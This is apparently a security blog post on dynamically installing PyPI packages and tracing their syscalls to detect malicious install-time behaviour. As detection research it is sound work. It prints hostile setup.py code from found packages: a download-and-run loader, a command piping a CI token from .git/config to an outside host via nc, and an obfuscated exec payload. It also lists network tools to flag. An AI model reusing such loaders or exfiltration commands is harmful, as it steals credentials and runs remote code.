Check thousands of PyPI packages for malware



About a year ago, the Python Software Foundation opened a Request for Information (RFI) to discuss how to detect malicious packages uploaded to PyPI. This is clearly a real problem affecting almost every package manager: taking over the names of packages abandoned by their developers, exploiting typos in the names of popular libraries, or hijacking packages through credential stuffing.

The reality is that package managers like PyPI are critical infrastructure that almost every company uses. I could write a lot on this topic, but this xkcd comic will suffice for now.

This area interests me, so I responded with my thoughts on how we could approach the problem. The entire post is worth reading, but one thought stuck with me: what happens immediately after a package is installed.

Actions such as establishing network connections or executing commands during pip install should always be treated with caution, since they give the developer almost no chance to examine the code before something bad happens.

I wanted to dig deeper into this matter, so in this post I will share how I installed and analyzed each PyPI package looking for malicious activity.

How to find malicious libraries

To execute arbitrary commands during installation, authors usually add code to their package’s setup.py file. Examples can be seen in this repository.

At a high level, to find potentially harmful dependencies, we can do two things: look at the code for bad things (static analysis) or take a risk and just install them to see what happens (dynamic analysis).

Although static analysis is very interesting (thanks to grep I have found malicious packages even in npm), in this post I will cover dynamic analysis. In the end, I think it is more reliable, because we are watching what actually happens rather than just looking for unpleasant things that might happen.

So what are we looking for?

How important actions are performed

In general, when something important happens, the work is done by the kernel. Regular programs (such as pip) that want the kernel to perform important actions use syscalls. Opening files, establishing network connections, executing commands: all of this is done through system calls!

You can learn more about this from Julia Evans’s comic.
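To make that mapping concrete, here is a minimal sketch in Python. The os functions used below are thin wrappers around the corresponding system calls; on Linux, a tracer would typically show an open or openat, a write, and a close for this snippet. The function names and the file name are hypothetical and only serve the illustration.

```python
import os
import tempfile


def write_via_syscall_wrappers(path: str, data: bytes) -> int:
    """Write data to path using low-level os wrappers; return bytes written."""
    # os.open asks the kernel for a file descriptor (open/openat on Linux).
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    try:
        # os.write hands the bytes to the kernel (write syscall).
        return os.write(fd, data)
    finally:
        # os.close releases the descriptor (close syscall).
        os.close(fd)


def demo() -> bytes:
    """Write a file in a temporary directory and read it back."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "syscall-demo.txt")  # hypothetical file name
        write_via_syscall_wrappers(path, b"hello kernel\n")
        with open(path, "rb") as fp:
            return fp.read()
```

Every one of these calls crosses into the kernel, which is exactly where a syscall tracer sits.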

This means that if we can observe the syscalls made while a Python package is being installed, we can tell whether something suspicious is going on. The advantage of this approach is that it does not depend on how heavily the code is obfuscated: we see exactly what is actually happening.

It’s important to note that I didn’t come up with the idea of watching syscalls. People like Adam Baldwin have been talking about it since 2017. In addition, there is a great article published by the Georgia Institute of Technology which, among other things, takes the same approach. In all honesty, in this post I’ll just try to reproduce their work.

So we know we want to track syscalls, but how exactly do we do that?

Tracking Syscalls with Sysdig

There are many tools available to monitor syscalls. For my project I used sysdig, because it provides both structured output and convenient filtering.

To make this work, whenever I started a Docker container to install a package, I also started a sysdig process that monitored only the events from that container. I also filtered out network reads and writes to and from pypi.org and files.pythonhosted.org, because I didn’t want to clutter the logs with traffic related to downloading packages.
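The filtering itself happened inside sysdig, and the exact filter expression is not shown here. As a rough equivalent, the same idea can be sketched as a post-processing step in Python. The event shape (a dict with an optional "host" key) is an assumption made for this example, not sysdig's actual output format.

```python
from typing import Iterable, Iterator

# Hosts that pip contacts for ordinary package downloads.
DOWNLOAD_HOSTS = {"pypi.org", "files.pythonhosted.org"}


def drop_download_traffic(events: Iterable[dict]) -> Iterator[dict]:
    """Yield events, skipping network events that target a download host."""
    for event in events:
        host = event.get("host")  # hypothetical field name
        if host is not None and host.lower() in DOWNLOAD_HOSTS:
            continue  # ordinary package download, not interesting
        yield event
```

Events without a host (file access, command execution) pass through untouched, so only the download noise is removed.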

Having found a way to intercept syscalls, I had to solve another problem: get a list of all PyPI packages.

Getting Python packages

Luckily for us, PyPI has an API called the “Simple API”, which can also be thought of as “a very large HTML page with a link to each package”, because that is what it is. It is a simple, neat page written in very high-quality HTML.

You can take this page and parse out all the links with pup, which yields about 268 thousand packages:

❯ curl https://pypi.org/simple/ | pup 'a text{}' > pypi_full.txt               

❯ wc -l pypi_full.txt 
  268038 pypi_full.txt
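For readers without pup, roughly the same extraction can be sketched with Python's standard library. This is an illustration rather than the tooling used for the experiment; the class and function names are made up for the example, and the HTML is expected to be fetched separately.

```python
from html.parser import HTMLParser
from typing import List


class AnchorTextParser(HTMLParser):
    """Collect the text content of every <a> element."""

    def __init__(self) -> None:
        super().__init__()
        self.names: List[str] = []
        self._in_anchor = False
        self._buffer: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._in_anchor = True
            self._buffer = []

    def handle_data(self, data):
        if self._in_anchor:
            self._buffer.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._in_anchor:
            name = "".join(self._buffer).strip()
            if name:
                self.names.append(name)
            self._in_anchor = False


def package_names(html: str) -> List[str]:
    """Return the link texts of an index page, in document order."""
    parser = AnchorTextParser()
    parser.feed(html)
    parser.close()
    return parser.names
```

Feeding it the body of https://pypi.org/simple/ should give one name per package, comparable to the pup output above.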

For this experiment, I will only be interested in the most recent release of each package. There is a chance that there are malicious versions of packages buried in older releases, but the AWS bills will not pay themselves.
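One way to find the most recent release is PyPI's JSON endpoint, which reports the current version under info.version. The sketch below assumes that endpoint; the helper names are hypothetical, and the pipeline's actual metadata code is not shown in this post.

```python
import json
from typing import Optional
from urllib.parse import quote
from urllib.request import urlopen


def metadata_url(package: str) -> str:
    """Build the JSON metadata URL for a package name."""
    return f"https://pypi.org/pypi/{quote(package, safe='')}/json"


def latest_version(payload: dict) -> Optional[str]:
    """Return info.version from a metadata payload, or None if absent."""
    info = payload.get("info") or {}
    return info.get("version") or None


def fetch_latest_version(package: str, timeout: float = 10.0) -> Optional[str]:
    """Download the metadata and extract the latest version (needs network)."""
    with urlopen(metadata_url(package), timeout=timeout) as response:
        return latest_version(json.load(response))
```

Packages with no published versions can then be skipped when latest_version returns None.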

As a result, I ended up with something like this processing pipeline:

In short, we send the name of each package to a set of EC2 instances (in the future I would like to use something like Fargate, but I don’t know Fargate, so…), which fetch the package metadata from PyPI and then run sysdig alongside a set of containers that install the package via pip install, collecting information about syscalls and network traffic along the way. All the data is then shipped to S3 for me to deal with later.

This is what the process looks like:

Results

When the process finished, I had about a terabyte of data in an S3 bucket, covering about 245 thousand packages. Some packages had no published versions and others hit various processing errors, but overall this looks like a great sample to work with.
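The install step for a single package could be launched along these lines. This is only a sketch: the image name and container name are placeholders, and the real container setup used in the experiment is not described in this post. Building an argument list instead of a shell string avoids any shell interpretation of package names.

```python
from typing import List


def docker_install_argv(
    package: str,
    version: str,
    container_name: str,
    image: str = "python:3.8-slim",  # placeholder image, an assumption
) -> List[str]:
    """Build a docker command that installs one pinned package version."""
    return [
        "docker", "run", "--rm",
        "--name", container_name,  # lets a tracer filter on this container
        image,
        "pip", "install", "--no-cache-dir", f"{package}=={version}",
    ]
```

The resulting list can be passed to subprocess.run while the tracer watches the container with the matching name.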

Now for the fun part: a bunch of grep analysis

I combined the metadata and the output to create a set of JSON files that looked something like this:

{
    "metadata": {},
    "output": {
        "dns": [],         // Any DNS requests made
        "files": [],       // All file access operations
        "connections": [], // TCP connections established
        "commands": [],    // Any commands executed
    }
}

Then I wrote a set of scripts to start collecting data, trying to figure out what is harmless and what is harmful. Let’s explore some of the results.
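A first-pass triage script over files of that shape might look like the sketch below. It is not one of the actual scripts; the function names are hypothetical, and it assumes only the four keys shown in the JSON layout above.

```python
OUTPUT_KEYS = ("dns", "files", "connections", "commands")


def summarize(report: dict) -> dict:
    """Count the entries recorded under each output key."""
    output = report.get("output") or {}
    return {key: len(output.get(key) or []) for key in OUTPUT_KEYS}


def needs_review(report: dict) -> bool:
    """Flag reports that made connections or executed commands."""
    counts = summarize(report)
    return counts["connections"] > 0 or counts["commands"] > 0
```

Running needs_review over every report narrows the sample down to the packages worth a closer look.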

Network requests

There are many reasons why a package might need to make a network connection during installation. Perhaps it needs to download binaries or other resources, it may be some kind of analytics, or it may be trying to exfiltrate data or credentials from the system.

It turned out that 460 packages make network connections to 109 unique hosts. As noted in the article mentioned above, quite a few of these are caused by packages sharing a common dependency that makes the network connection. These could be filtered out by mapping dependencies, but I haven’t done that yet.

A detailed breakdown of the DNS lookups observed during installation is located here.
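Counting how many packages look up each host is one way to spot hosts that are probably reached through a shared dependency. The sketch below assumes the report layout shown earlier, with each DNS entry carrying a "name" key as in the examples later in this post; the function name is hypothetical.

```python
from collections import Counter
from typing import Iterable


def host_counts(reports: Iterable[dict]) -> Counter:
    """Count, per DNS name, the number of reports that looked it up."""
    counts: Counter = Counter()
    for report in reports:
        dns = (report.get("output") or {}).get("dns") or []
        # Use a set so a host is counted once per package.
        names = {entry["name"] for entry in dns if "name" in entry}
        counts.update(names)
    return counts
```

A host that shows up in hundreds of reports is more likely a common dependency than a targeted attack, while a host seen once deserves a look.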

Command execution

As with network connections, packages can have harmless reasons to execute system commands during installation. This can be done to compile native binaries, set up the desired environment, and so on.

In our sample, 60,725 packages execute commands during installation. As with network connections, keep in mind that many of these result from a dependency on another package that executes the commands.

Interesting packages

After examining the results, most of the network connections and commands looked harmless as expected. But there are several cases of strange behavior that I wanted to point out in order to demonstrate the usefulness of this kind of analysis.

i-am-malicious

The package named i-am-malicious appears to be a proof of concept of a malicious package. Here are some interesting details suggesting that this package is worth investigating (in case its name was not enough):

{
  "dns": [{
      "name": "gist.githubusercontent.com",
      "addresses": [
        "199.232.64.133"
      ]
  }],
  "files": [
    ...
    {
      "filename": "/tmp/malicious.py",
      "flag": "O_RDONLY|O_CLOEXEC"
    },
    ...
    {
      "filename": "/tmp/malicious-was-here",
      "flag": "O_TRUNC|O_CREAT|O_WRONLY|O_CLOEXEC"
    },
    ...
  ],
  "commands": [
    "python /tmp/malicious.py"
  ]
}

We can immediately see what is happening here. A connection is made to gist.githubusercontent.com, a Python file is executed, and a file named /tmp/malicious-was-here is created. Sure enough, this happens right in setup.py:

from urllib.request import urlopen

handler = urlopen("https://gist.githubusercontent.com/moser/49e6c40421a9c16a114bed73c51d899d/raw/fcdff7e08f5234a726865bb3e02a3cc473cecda7/malicious.py")
with open("/tmp/malicious.py", "wb") as fp:
    fp.write(handler.read())

import subprocess

subprocess.call(["python", "/tmp/malicious.py"])

The malicious.py file simply writes a message like “I’ve been here” to /tmp/malicious-was-here, hinting that this is indeed a proof of concept.
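A pattern like this one can be turned into a simple rule: flag any command whose arguments include a file under /tmp that was also touched during the install. The following is a rough heuristic sketch over the output format shown above, not a rule used in the original analysis; the function name and the /tmp/ default are assumptions.

```python
import shlex
from typing import List


def commands_running_tmp_files(output: dict, prefix: str = "/tmp/") -> List[str]:
    """Return commands that reference a touched file under the given prefix."""
    touched = {
        entry["filename"]
        for entry in output.get("files", [])
        if isinstance(entry, dict) and "filename" in entry
    }
    flagged = []
    for command in output.get("commands", []):
        try:
            args = shlex.split(command)
        except ValueError:  # unbalanced quotes, fall back to naive split
            args = command.split()
        # Skip args[0], which is the program being run.
        if any(arg.startswith(prefix) and arg in touched for arg in args[1:]):
            flagged.append(command)
    return flagged
```

Applied to the output above, this flags the python /tmp/malicious.py command.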

maliciouspackage

Another self-described malware package, ingeniously named maliciouspackage, is slightly more malevolent. Here’s its output:

{
  "dns": [{
      "name": "laforge.xyz",
      "addresses": [
        "34.82.112.63"
      ]
  }],
  "files": [
    {
      "filename": "/app/.git/config",
      "flag": "O_RDONLY"
    }
  ],
  "commands": [
    "sh -c apt install -y socat",
    "sh -c grep ci-token /app/.git/config | nc laforge.xyz 5566",
    "grep ci-token /app/.git/config",
    "nc laforge.xyz 5566"
  ]
}

As in the first case, this gives us a good idea of what is going on. In this example, the package extracts a token from the .git/config file and sends it to laforge.xyz. Taking a look at setup.py, we see exactly what is happening:

...
import os
os.system('apt install -y socat')
os.system('grep ci-token /app/.git/config | nc laforge.xyz 5566')
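Commands like these suggest another crude heuristic: flag any executed command that mentions a common network tool. The tool list and function name below are assumptions chosen for illustration, and a check this simple will produce false positives (for example, a file that happens to be named curl).

```python
import shlex

# Hypothetical, non-exhaustive list of tools often used to move data.
NETWORK_TOOLS = {"nc", "ncat", "netcat", "socat", "curl", "wget"}


def uses_network_tool(command: str) -> bool:
    """Return True if any token of the command names a known network tool."""
    try:
        tokens = shlex.split(command)
    except ValueError:  # unbalanced quotes, fall back to naive split
        tokens = command.split()
    # Compare basenames so /usr/bin/nc matches as well.
    return any(token.rsplit("/", 1)[-1] in NETWORK_TOOLS for token in tokens)
```

On the commands recorded for maliciouspackage, this flags the socat installation and both nc invocations, but not the plain grep.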

easyIoCtl

A curious package is easyIoCtl. It claims to provide “abstractions from boring I/O”, but we see the following commands being executed:

[
  "sh -c touch /tmp/testing123",
  "touch /tmp/testing123"
]

Suspicious, but not harmful. However, this is an ideal example of the power of syscall tracking. Here is the relevant code from the project’s setup.py:

class MyInstall():
    def run(self):
        control_flow_guard_controls = 'l0nE@`eBYNQ)Wg+-,ka}fM(=2v4AVp![dR/\\ZDF9s\x0c~PO%yc X3UK:.w\x0bL$Ijq<&r6*?\'1>mSz_^Cto#hiJtG5xb8|;n7T{uH]"r'
        control_flow_guard_mappers = [81, 71, 29, 78, 99, 83, 48, 78, 40, 90, 78, 40, 54, 40, 46, 40, 83, 6, 71, 22, 68, 83, 78, 95, 47, 80, 48, 34, 83, 71, 29, 34, 83, 6, 40, 83, 81, 2, 13, 69, 24, 50, 68, 11]
        control_flow_guard_init = ""
        for controL_flow_code in control_flow_guard_mappers:
            control_flow_guard_init = control_flow_guard_init + control_flow_guard_controls[controL_flow_code]
        exec(control_flow_guard_init)

With this level of obfuscation, it is difficult to understand what is happening. Traditional static analysis could flag the call to exec, but that’s all.

To see what’s going on, we can replace exec with print, which gives the following:

import os;os.system('touch /tmp/testing123')

This is exactly the command we observed, which demonstrates that even obfuscated code does not affect the results, because we are tracking at the level of system calls.
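The decoding step can be reproduced safely without running the payload. In the sketch below, the lookup string is my reconstruction of the one in the listing, with the backslash escapes restored as an assumption; the index list is copied as-is. The constant and function names are made up for the example.

```python
# Lookup table reconstructed from the listing (escape sequences are assumed).
CONTROLS = 'l0nE@`eBYNQ)Wg+-,ka}fM(=2v4AVp![dR/\\ZDF9s\x0c~PO%yc X3UK:.w\x0bL$Ijq<&r6*?\'1>mSz_^Cto#hiJtG5xb8|;n7T{uH]"r'

# Indices into the lookup table, copied from setup.py.
MAPPERS = [81, 71, 29, 78, 99, 83, 48, 78, 40, 90, 78, 40, 54, 40, 46, 40,
           83, 6, 71, 22, 68, 83, 78, 95, 47, 80, 48, 34, 83, 71, 29, 34,
           83, 6, 40, 83, 81, 2, 13, 69, 24, 50, 68, 11]


def decode(controls: str, mappers: list) -> str:
    """Rebuild the hidden source by indexing into the lookup table."""
    return "".join(controls[index] for index in mappers)


if __name__ == "__main__":
    # Print the payload instead of passing it to exec.
    print(decode(CONTROLS, MAPPERS))
```

Because the result is only printed, nothing in the hidden payload is ever executed.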

What happens when we find a malicious package?

It is worth briefly describing what we can do when we find a malicious package. The first step is to notify PyPI volunteers so they can remove the package. You can do this by writing to security@python.org.

After that, you can see how many times the package has been downloaded using the PyPI public dataset on BigQuery.

Here is an example query to find out how many times maliciouspackage was downloaded in the last 30 days:

#standardSQL
SELECT COUNT(*) AS num_downloads
FROM `the-psf.pypi.file_downloads`
WHERE file.project="maliciouspackage"
  -- Only query the last 30 days of history
  AND DATE(timestamp)
    BETWEEN DATE_SUB(CURRENT_DATE(), INTERVAL 30 DAY)
    AND CURRENT_DATE()

Running this query reveals that it has been downloaded over 400 times.

Moving on

So far, we’ve only looked at PyPI in general. Looking at the data, I could not find any packages that perform meaningfully malicious actions and do not have the word “malicious” in their name. And this is good! But there is always the possibility that I have missed something, or that it will happen in the future. If you are curious to explore the data, you can find it here.

Later, I will write a Lambda function that fetches the latest package changes using PyPI’s RSS feed. Each updated package will go through the same processing, and a notification will be sent if suspicious activity is detected.

I still don’t like that it is possible to execute arbitrary commands on a user’s system simply by installing a package via pip install. I understand that most use cases are harmless, but this opens up threats that need to be considered. Hopefully, by strengthening our monitoring of the various package managers, we can detect signs of malicious activity before they have a serious impact.

And this situation is not unique to PyPI. Later, I hope to do the same analysis for RubyGems, npm, and other package managers, as the researchers mentioned above did. All the code used for the experiment can be found here. As always, if you have any questions, ask them!
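As a rough idea of what that function might do, the sketch below extracts package names from the XML of PyPI's updates feed. It assumes that each item title has the form "name version", which should be checked against the live feed; the constant and function names are hypothetical, and fetching the feed and sending notifications are left out.

```python
import xml.etree.ElementTree as ET
from typing import List

UPDATES_FEED = "https://pypi.org/rss/updates.xml"


def updated_packages(feed_xml: str) -> List[str]:
    """Return unique package names from an RSS feed, in feed order."""
    root = ET.fromstring(feed_xml)
    seen = set()
    names = []
    for title in root.iterfind("./channel/item/title"):
        text = (title.text or "").strip()
        if not text:
            continue
        name = text.split()[0]  # assumes titles look like "name version"
        if name not in seen:
            seen.add(name)
            names.append(name)
    return names
```

Each returned name could then be pushed through the same install-and-trace pipeline described above.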

